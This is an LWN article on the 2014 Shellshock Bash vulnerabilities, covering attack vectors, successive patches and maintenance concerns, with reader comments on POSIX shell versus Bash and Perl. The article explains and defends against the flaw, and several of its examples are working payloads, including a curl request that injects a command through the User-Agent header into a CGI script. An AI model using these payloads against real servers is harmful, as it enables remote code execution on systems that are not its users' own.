Bash gets shellshocked
It's been a crazy week for the Bash shell, its maintainer, and the many Linux distributions that use the shell. A remote code-execution vulnerability that was reported on September 24 has morphed into multiple related vulnerabilities, most of which have now been fixed, with updates released by distributions. The vulnerabilities have been dubbed "Shellshock" and the technical (and mainstream) press has had a field day reporting on the incident. It all revolves around a somewhat dubious Bash feature, but the widespread use of Bash in places where it may not really make sense contributed to the severity of the bug.
First bug
The bug, which was evidently introduced into Bash around 1992, (ab)uses the environment-variable parsing code by adding extra commands after defining a function. It was not common knowledge that you could even define a function by way of an environment variable; it is a little-used feature that was also, evidently, not strenuously tested. An attacker who could set an environment variable could do:
VAR=() { ignored; }; /bin/id

The result is a shell function named VAR, but that's not the most dangerous part. Because of a bug in the parser, Bash didn't stop processing the variable once the function definition was complete, so it would execute /bin/id every time the variable was parsed, which happens at Bash startup time.
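The effect is easy to demonstrate without any network-facing service involved. Here is a minimal sketch, substituting a harmless echo for /bin/id; the extra line of output appears only if the Bash under test is unpatched:

$ env 'VAR=() { :; }; echo vulnerable' bash -c 'echo hello'
vulnerable
hello

The "vulnerable" line is printed by an unpatched Bash as it imports VAR; a fixed Bash prints only "hello".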
Normally, just on general principles, one avoids giving attackers ways to set environment variables in shells. But, as it turns out, there are a number of ways for an attacker to do so. The easiest (and perhaps best known) way is to use the Common Gateway Interface (CGI) protocol. All CGI programs get invoked with certain environment variables set whose values are controlled by the client (REMOTE_HOST, SERVER_PROTOCOL, and so on). If Bash is invoked, either because the CGI program is a Bash script or through some other means, it will parse the environment variables and execute any code the attacker tacked on. Game over.
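To make that concrete, here is a deliberately bare-bones sketch; the script name and URL are hypothetical, and any header the server exports as an environment variable would do. A trivial Bash CGI script:

#!/bin/bash
# status.sh - hypothetical CGI script; does nothing interesting itself
echo "Content-type: text/plain"
echo
echo "OK"

and a request that would exploit it, via the HTTP_USER_AGENT environment variable, on a server running an unpatched Bash:

$ curl -H 'User-Agent: () { :; }; /bin/id' http://example.com/cgi-bin/status.sh

The payload runs when the web server starts Bash to execute the script, before the script's own code has any say in the matter.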
There may not be all that many Bash-specific CGI programs in the wild, but many Linux distributions (notably not Debian or Ubuntu) make exploiting the bug easier still: they link /bin/sh to Bash. So, any /bin/sh CGI scripts (of which there still probably aren't all that many) are vulnerable. More worryingly, CGI programs in any language that use the shell (e.g. via system(), popen(), or similar) may well be vulnerable.
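Whether the system() route is open on a given machine thus comes down largely to what /bin/sh really is, which takes one command to check (the answer varies by distribution; typical results are noted in the comment):

$ readlink -f /bin/sh    # /bin/bash on many distributions; /bin/dash on Debian and Ubuntu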
Beyond CGI programs, there are a number of other possible vectors for attack. DHCP clients often invoke shell scripts for configuring the network and use environment variables to communicate to those scripts. Mail transfer agents (MTAs) may be affected; Exim and qmail are both vulnerable. Restricted OpenSSH logins (using the ForceCommand directive) can bypass the restrictions using Shellshock. And so on. Red Hat has compiled a list of some of the affected (and unaffected) programs.
Fixes
Michał Zalewski has a blog post from September 25 that describes the original bug along with the first patch. That patch worried Zalewski and others since it simply stopped processing once the function definition had been parsed; it would no longer execute code placed after the definition. But, as he pointed out, it still allowed an attacker to send an HTTP header like:
Cookie: () { echo "Hello world"; }

The CGI program would then get an environment that contained a function called HTTP_COOKIE(). It is unlikely that such a function could be called by accident, "but intuitively it's a pretty scary outcome".
As Zalewski described, that first patch was fragile because it made two assumptions about the Bash parser—both of which were later shown to be incorrect, as updates sprinkled throughout the post attest. He advocated Florian Weimer's approach, which puts the functions defined in environment variables into a different namespace by adding a prefix and suffix to the names. That should avoid allowing environment variables to be unknowingly set to functions by web servers and other programs.
Weimer's patch was eventually merged with a few tweaks (e.g. changing the suffix from "()" to "%%") by Bash maintainer Chet Ramey. So there is now an easy test to determine if a system is susceptible to the bugs:
$ foo='() { echo not patched; }' bash -c foo
bash: foo: command not found

If the output shows "not patched" rather than the above, Bash is still vulnerable. Zalewski's post from September 27 describes some of the additional parser bugs found that led Ramey to adopt the namespace approach.
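On a Bash with the namespace fix applied, an exported function is still visible in the environment, just under a mangled name that an ordinary variable import will not match. A quick illustration (the BASH_FUNC_...%% spelling shown is the one upstream settled on; earlier patch iterations used different decorations):

$ f() { echo hi; }
$ export -f f
$ env | grep -A1 BASH_FUNC
BASH_FUNC_f%%=() {  echo hi
}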
Meanwhile, distributions have been a bit whipsawed: updating Bash, seeing more bug reports, and updating again. At this point, things have mostly settled down on that front. All that remains is for users to update their systems. Since both Debian and Ubuntu use the Debian Almquist shell (Debian ash or dash) for /bin/sh, there is likely far less risk of an exploit, though Bash should still be updated.
More changes may be coming. Christos Zoulas suggested that a flag be added to govern importing functions through environment variables, with a default of "off". That is a change he has made for NetBSD's Bash: "It is not wise to expose bash's parser to the internet and then debug it live while being attacked." Others have agreed that it would provide a stronger defense against other, unknown flaws in the parser. Scripts that use the feature (which seem to be few in number) could be changed to turn the feature on.
It should be noted that attacks are ongoing in the wild. For example, the LWN web logs are full of attempts to exploit the vulnerabilities.
While there is plenty to worry about with regard to Shellshock, some in the press have gone a little overboard. It is unlikely, for instance, that vast numbers of embedded Linux devices are vulnerable, medical-related or otherwise. The problem of embedded Linux devices that can't be updated is certainly real (and likely to bite us at some point), but Bash is not typically installed in the embedded world. Most such devices are likely to be using BusyBox, whose shell is ash, so they are not vulnerable. Another large chunk of Linux devices, Android systems, use mksh (the MirBSD Korn shell) rather than Bash.
Since Bash is a heavyweight shell, with a long startup time and high memory requirements, one might wonder why many Linux distributions make it the default shell for shell scripts. Debian and Ubuntu moved away from Bash for shell scripts for just those reasons. Slackware uses ash for its install scripts as well. These bugs may lead to a push in more distributions to switch to a more minimal shell as the default for scripts. This is not likely to be the last Bash vulnerability we see—especially now that security researchers (and attackers) are focused on it.
The "function definition via environment variable" feature seems to be of limited utility. Also, since it isn't all that well-known, it has largely escaped scrutiny until recently. Weimer mentioned that the feature appears to be used by test harnesses. The search he did in Debian's code repositories bears that out. While it may be tempting to disable the feature, as Ian Jackson tried, the namespace fix is backward compatible so existing users can continue to use it. Movement toward reducing or eliminating Bash for non-interactive uses throughout Debian (i.e. eliminating #!/bin/bash), though, seems to be picking up some steam.
As with OpenSSL and Heartbleed, Shellshock has exposed a project that is critical to many Linux systems yet not completely healthy. Diego Pettenò described the problem in a blog post. Bash has a single maintainer, with a somewhat cathedral-like development process, which led Pettenò and others to be concerned about the shell long before Shellshock. It would seem prudent for the Linux community to be on the lookout for these kinds of problems now that we have been bitten twice in recent memory.
There are a number of programs that underlie a basic, functioning Linux system, but it is not entirely clear what that number is, nor which projects belong in that set. OpenSSL was an obvious member (though largely ignored until recently); Bash is less so, even though it is now clear that it is used in ways that can easily lead to system compromise. It is probably long past time for some kind of inventory of this "critical infrastructure" to be done. Once the projects are identified, some kind of health assessment and/or security audit can follow. We can be sure that those kinds of assessments are being done, at least informally, by attackers and black hats—we just don't get the benefit of their analysis.
Index entries for this article:
Security: Bash
Security: Vulnerabilities/Command injection
Posted Oct 1, 2014 20:58 UTC (Wed) by chutzpah (subscriber, #39595)

Some minor investigation finds that mksh appears to be an alternative that supports a reasonable number of these sorts of features, while still being relatively lightweight.
Posted Oct 2, 2014 14:52 UTC (Thu) by gwolf (subscriber, #14632)

$ diff -u <(cmd1) <(cmd2)

is way easier and clearer than

$ F1=`tempfile`
$ F2=`tempfile`
$ cmd1 > $F1 &
$ cmd2 > $F2 &
$ diff -u $F1 $F2
$ rm $F1 $F2

Of course, it makes sense to include this bashism in your scripts. And, of course, that'd make your scripts depend on bash.
Posted Oct 1, 2014 22:13 UTC (Wed) by wahern (subscriber, #37304)
There are various ways to handle lists of things in the POSIX syntax. One lesser-known way is by using the "set -- [...]" construct, which resets your local argument vector. A more common method is using read(1).
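A minimal sketch of both techniques in plain POSIX sh (nothing here assumes Bash; note that read-based loops still stumble over values containing embedded newlines):

set -- alpha beta 'gamma delta'    # the positional parameters become the list
for item in "$@"; do
    printf '%s\n' "$item"
done

printf '%s\n' one two three |      # consume a list line-by-line with read
while IFS= read -r line; do
    printf 'got %s\n' "$line"
done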
Many times people use Bash-specific features simply because they don't understand or care about POSIX syntax. I'd love to see a count of hands of shell programmers who have ever read the POSIX documentation for the shell. See http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html. The framed version is much easier to read: http://pubs.opengroup.org/onlinepubs/9699919799/
But as josh said, if you're writing software that really requires juggling lots of data, why keep the shell? Why not just switch to Perl, for example? I'd be surprised if Perl wasn't installed by default on at least as many vendor platforms as Bash. Unless your goal is sheer portability or simplicity, using the shell doesn't make any sense.
Bash in particular is hardly more light-weight than Perl. The Bash and Perl interpreters are comparable in size. Compare them to dash:

$ ls -sh /bin/bash
1000K /bin/bash
$ ls -sh /usr/bin/perl /usr/lib/libperl.so.5.18.2
12K /usr/bin/perl 1.6M /usr/lib/libperl.so.5.18.2
$ ls -sh /bin/dash
120K /bin/dash

And, no, bash is not statically linked in the above. Assuming all the developers of those projects are equally good programmers, how many bugs do you think lurk in bash compared to dash? Are arrays really worth all that code surface? Perl might be bigger, but I'd bet Perl has fewer bugs just because the language grammar is simpler and more regular--go figure. And, yes, using the shell is fraught with quoting problems. Historically that was not only because the shell syntax mixes code and data in subtle ways, but because the shells themselves often had parsers which caused unexpected behavior (sometimes a bug, sometimes a "feature"). Using Bash features may address the former to some small extent, but it certainly doesn't address the latter.
Posted Oct 1, 2014 22:36 UTC (Wed) by Jandar (subscriber, #85683)
One global array is hardly a replacement for the bash arrays. Btw the set builtin is well-known.
> A more common method is using read(1).
Do you mean managing arrays in multiple tempfiles and reading (+ writing with ugly escapes) on every use? Appalling.

The omission of arrays in the POSIX shell is the major reason for me to ignore it and use bash.
Posted Oct 3, 2014 9:48 UTC (Fri) by Jandar (subscriber, #85683)

typeset -a Options Files
Options+=("$option1")
Files+=("$file1")
$UseVerbose && Options+=("-v")
$UseSecondFile && Files+=("$file2")
command "${Options[@]}" -- "${Files[@]}"

How do you prepare (with correct quoting) a dynamic argument vector without arrays? All other methods are ugly and error-prone beyond any acceptable limit.
Posted Oct 17, 2014 11:12 UTC (Fri) by mgedmin (subscriber, #34497)
paths[${#paths[*]}]="$1"
Rewriting this to use +=() will make my scripts a bit saner.
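For comparison, the two append idioms side by side (both add one element; to my knowledge the += form needs Bash 3.1 or newer):

paths[${#paths[*]}]="$1"    # append by computing the next index
paths+=("$1")               # append with the += operator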
Posted Oct 3, 2014 19:30 UTC (Fri) by wahern (subscriber, #37304)

foo() {
    printf "$# -> $*\n"
    set -- A B C
    printf "$# -> $*\n"
}

set -- 1 2 3 4
foo
printf "$# -> $*\n"
Also, per POSIX: "Positional parameters are initially assigned when the shell is invoked (see sh), temporarily replaced when a shell function is invoked (see Function Definition Command), and can be reassigned with the set special built-in command."
Obviously this isn't a complete substitute for arrays, neither alone nor in tandem with other alternatives.
But my point is that people use Bash features without understanding the alternatives, and without appreciating the cost of Bash. Bash is a great interactive shell. But if you're serious about shell programming, one should learn POSIX syntax, as well as sed(1), awk(1), and the nuances of other utilities. This isn't hard because the POSIX documentation is infinitely more clear and concise than implementation documentation. A good way to practice is with Solaris, because Solaris' utilities are often annoyingly anachronistic (e.g. grep doesn't even have a recursive mode), but dash isn't a bad place to start, either. And when you do choose to use extended functionality, do so knowingly, having assessed the costs and benefits.
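As a small example of that mindset, here is a Bash-only construct next to a portable replacement built from a standard utility (a sketch; the two behave the same for ASCII input):

var=hello
echo "${var^^}"                       # Bash 4+ case conversion
printf '%s\n' "$var" | tr a-z A-Z     # POSIX sh plus tr(1)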
Posted Oct 2, 2014 8:31 UTC (Thu) by ibukanov (subscriber, #3942)

Perl is not particularly safer with syntax that is similar in complexity to Bash's. Besides, Shellshock comes not from the syntax but from a badly designed Bash feature that could be provided for "convenience" just as well in Perl or Python or JavaScript under node.js.
Posted Oct 2, 2014 9:41 UTC (Thu) by niner (subscriber, #26151)

Perl does not mix program code with data. Perl has a taint mode that catches many cases of missing input sanitation. And Perl's system() function only invokes /bin/sh if the given command contains shell metacharacters; it also supports the system PROGRAM LIST form, which never invokes a shell at all (it uses exec()) and avoids many errors with missing parameter quoting.

So I'd argue that it is much easier to program safely in Perl than in Bash.
Posted Oct 2, 2014 15:54 UTC (Thu) by ibukanov (subscriber, #3942)

I want to repeat that Shellshock has nothing to do with the programming style of Bash scripts. It comes from a badly designed and implemented feature of the Bash interpreter, which is written in C. The Perl runtime could just as easily provide a similar "feature" affecting any Perl script, strict or not. For example, can you assert with certainty that the Perl interpreter has no bugs related to reading of environment variables that could trigger execution of arbitrary Perl code?
Posted Oct 2, 2014 17:31 UTC (Thu) by dskoll (subscriber, #1630)

> Perl runtime could just as easily provide a similar "feature" affecting any Perl script, strict or not.
But it doesn't. Well, with one exception: Setting PERL5DB will make perl execute arbitrary Perl code, but only if it has been invoked with the "-d" command-line flag which says to run under a debugger, and no Perl script uses that flag.
Perl makes environment variables available in the %ENV hash, but certainly doesn't try to interpret them as Perl code (modulo the single exception above.)
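That difference is easy to check from the shell (assuming a perl binary is available): a Shellshock-style payload comes back out of %ENV as inert text rather than being executed:

$ VAR='() { :; }; echo pwned' perl -e 'print "$ENV{VAR}\n"'
() { :; }; echo pwned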
Posted Oct 5, 2014 20:15 UTC (Sun) by alankila (guest, #47141)
Thankfully, none of this is even close to as bad as what bash did.
Posted Oct 7, 2014 14:35 UTC (Tue) by dskoll (subscriber, #1630)
PERL5LIB and PERL5INC are not used in taint mode. Bash really needs a taint mode.
Posted Oct 7, 2014 17:31 UTC (Tue) by mathstuf (subscriber, #69389)

Bash needs an overlay:

 _____________________________________________
/ It looks like your script is over 100 lines \
\ long; did you mean to write this in Perl?   /
 ---------------------------------------------
   \
    \
             .::!!!!!!!:.
  .!!!!!:.              .:!!!!!!!!!!!!
  ~~~~!!!!!!.       .:!!!!!!!!!UWWW$$$
      :$$NWX!!:   .:!!!!!!XUWW$$$$$$$$$P
      $$$$$##WX!:  .<!!!!UW$$$$"  $$$$$$$$#
      $$$$$  $$$UX   :!!UW$$$$$$$$$   4$$$$$*
      ^$$$B  $$$$\     $$$$$$$$$$$$   d$$R"
        "*$bd$$$$      '*$$$$$$$$$$$o+#"
             """"          """""""
Posted Oct 2, 2014 21:25 UTC (Thu) by flussence (guest, #85566)
It's had that feature for decades: 2-arg open() will happily interpret any filename passed to it containing a "|" prefix or suffix to mean a command pipe, and helpfully give the rest of the string to the shell to run. The same function is also used internally to pass filenames in ARGV into the magic <> line-iterator.
Posted Oct 3, 2014 11:23 UTC (Fri) by dskoll (subscriber, #1630)

> 2-arg open() will happily interpret any filename passed to it containing a "|" prefix or suffix
That's a little different from the bash bug. It requires the programmer to write a script that doesn't handle user-input safely. It's also stopped in taint mode.
The Bash bug doesn't require any action on the part of the script writer; it happens before your script even has a chance to do anything.
Posted Oct 2, 2014 14:59 UTC (Thu) by gwolf (subscriber, #14632)

I do argue (see my comment above) for the utility of some sorts of bashisms, particularly those that help with controlling and quoting forked processes (another favorite of mine is using $() instead of ``, as it's *way* clearer). I won't argue for using Bash when you need arrays and local scopes: that's a clear indication you should switch to a real programming language. One that, among many other things, separates parsing/compiling from executing, because your program will most likely be complex enough to warrant it!
But yes, people complain about Perl being write-only. Bash constructs and mindset are way worse than Perl.
Posted Oct 2, 2014 15:38 UTC (Thu) by madscientist (subscriber, #16861)
As others have pointed out, if you want to write bash scripts that's fine and it's trivial to do: just start your script with #!/bin/bash. If you want to write POSIX shell scripts, start your script with #!/bin/sh. If you use #!/bin/sh and you use bash-isms, your script is simply wrong.
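For those auditing existing scripts, Debian's devscripts package ships a checkbashisms tool that flags Bash-only constructs in scripts that claim #!/bin/sh; a typical invocation is simply:

$ checkbashisms myscript.sh    # reports constructs such as ==, arrays, or &> with line numbers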
Posted Oct 9, 2014 11:30 UTC (Thu) by ssokolow (guest, #94568)

That sort of thing is why I encourage friends who are launching child processes to do their scripting in Python using the subprocess module. They really did a great job on designing its API... especially when paired with various other modules already part of the stdlib. Apparently someone's also ported it to Ruby though, unfortunately, it's not part of the stdlib there and I don't know whether shlex is also available. Plus, of course, the conveniences: shell=True can be avoided given shlex.split(), os.path.expanduser(), fnmatch.filter(), and glob.glob() from the Python standard library; the env argument makes it easy to call a subprocess with a sanitized environment; the cwd argument avoids the need for cd-ing as with os.system(), or doing an os.getcwd()/os.chdir() dance; and subprocess.call(), subprocess.check_call(), and subprocess.check_output() integrate nicely with the mix of try/except/finally and os.walk() I already recommend for that sort of scripting.
Posted Oct 2, 2014 13:49 UTC (Thu) by mbunkus (subscriber, #87248)
As much as I love and use Perl it doesn't have several things that I find extremely useful for scripting: set -e, set -x and zsh's globbing functionality. I don't know of an equivalent for either of the »set«s, and especially -e is truly a very effective way of preventing accidental mishaps.
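A tiny sketch of what those two options buy you (the simple case only; set -e famously has corner cases, e.g. inside if conditions or on the left side of pipelines):

#!/bin/bash
set -e                   # abort on the first failing command
set -x                   # trace each command as it runs
cp /nonexistent /tmp/    # this fails, so with -e the script stops here
echo "never reached"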
Then again: for me it's a question of when to switch from zsh to Perl, not from bash to Perl. zsh can do a lot of things that bash cannot, therefore I do get further via shell scripts than I would with bash; meaning the gain of switching from bash to Perl is usually higher than for zsh to Perl.
Posted Oct 2, 2014 11:00 UTC (Thu) by eru (subscriber, #2753)

Adding a selection of the more scripting-friendly bashisms to dash might not bloat it. For example, the array feature looks simple: one-dimensional only, integer indices, and dash already supports evaluating integer expressions in the context of $((expr)) expansion. Of course, identifying which are the most useful extensions (without taking all bash features) is a problem.
Posted Oct 4, 2014 7:03 UTC (Sat) by tomgj (guest, #50537)

The thing about moving to dash or ash for shell scripts is that some of the "bashisms" are truly useful features.
Posted Oct 9, 2014 10:59 UTC (Thu) by Tet (guest, #5433)

Okay but that doesn't mean that "sh" needs to be bash. The scripts that require bashisms can use bash explicitly by name, leaving sh to be a more minimal implementation of the POSIX shell.
Posted Oct 2, 2014 0:05 UTC (Thu) by pabs (subscriber, #43278)
http://bonedaddy.net/pabs3/log/2014/02/17/pid-preservatio...
Posted Oct 2, 2014 8:56 UTC (Thu) by dtlin (subscriber, #36537)
I don't know whether security was among the motivations, but the systemd suite consistently avoids shelling out. Everything is done by stuff like libraries in-process, D-Bus calls, or direct exec of another binary; I believe it's possible to boot a system without /bin/sh at all? Also systemd launches everything with a clean environment.
Commands specified in unit files (e.g. ExecStart=...) just get word-splitting and some substitutions made, no shell processing. I believe the same is true for udev rules and RUN+="..." but it seems a little more complex.
In practical terms, most of these things probably aren't attackable, with the exception of systemd-networkd, whose developer got to boast a bit by noting that its in-process DHCP client is unaffected by Shellshock (unlike dhclient and dhcpcd).
Posted Oct 3, 2014 9:52 UTC (Fri) by Siosm (subscriber, #86882)
I'm definitely not pro-bash, nor anti-dash, but switching shells because one vulnerability was found is "fear driven security".
Posted Oct 2, 2014 14:43 UTC (Thu) by CChittleborough (subscriber, #60775)

Why does Bash parse certain environment variables on startup? Like all POSIX shells, Bash has an export command which puts the specified shell variables into the environment of subsequently-executed commands. But Bash also has a -f option to export which exports shell functions instead of shell variables. For example:

# hello() { echo "Hello, CLI user"; }
# export -f hello
# bash
## hello
Hello, CLI user
## env | grep -A1 Hello,
hello=() { echo Hello, CLI user
}

The other thing going on here is that the Bash parser uses a yacc grammar whose input is specified by static variables. To execute a Bash script file, Bash gets the parser to read from that file and then return to its previous source of input. A Bash function is stored as a string and executed by getting the parser to read the string. The code that switches parser input around like this is not all that easy to understand. (I speak from experience.)

Fixing all these bugs is likely to make this code even more complex. For example, exported shell functions now use a new mode in which the parser stops after one command. Sigh.
Posted Oct 2, 2014 23:58 UTC (Thu) by giraffedata (guest, #1954)

Thanks. That really does explain the feature; no other description I've seen of the little-known function-in-environment-variable feature mentions that it's for export -f. What looked like a bizarre feature now looks fairly natural.

It also explains how a Bash change is able to provide the namespace fix (adding a prefix and suffix to the environment variable name when it contains a function): Bash is at both ends of the interface.

There's an interesting discussion of finding more parser bugs, including one that the discoverer didn't understand, here. In short, making sure that bash doesn't try to parse untrusted content seems to be the only safe thing to do.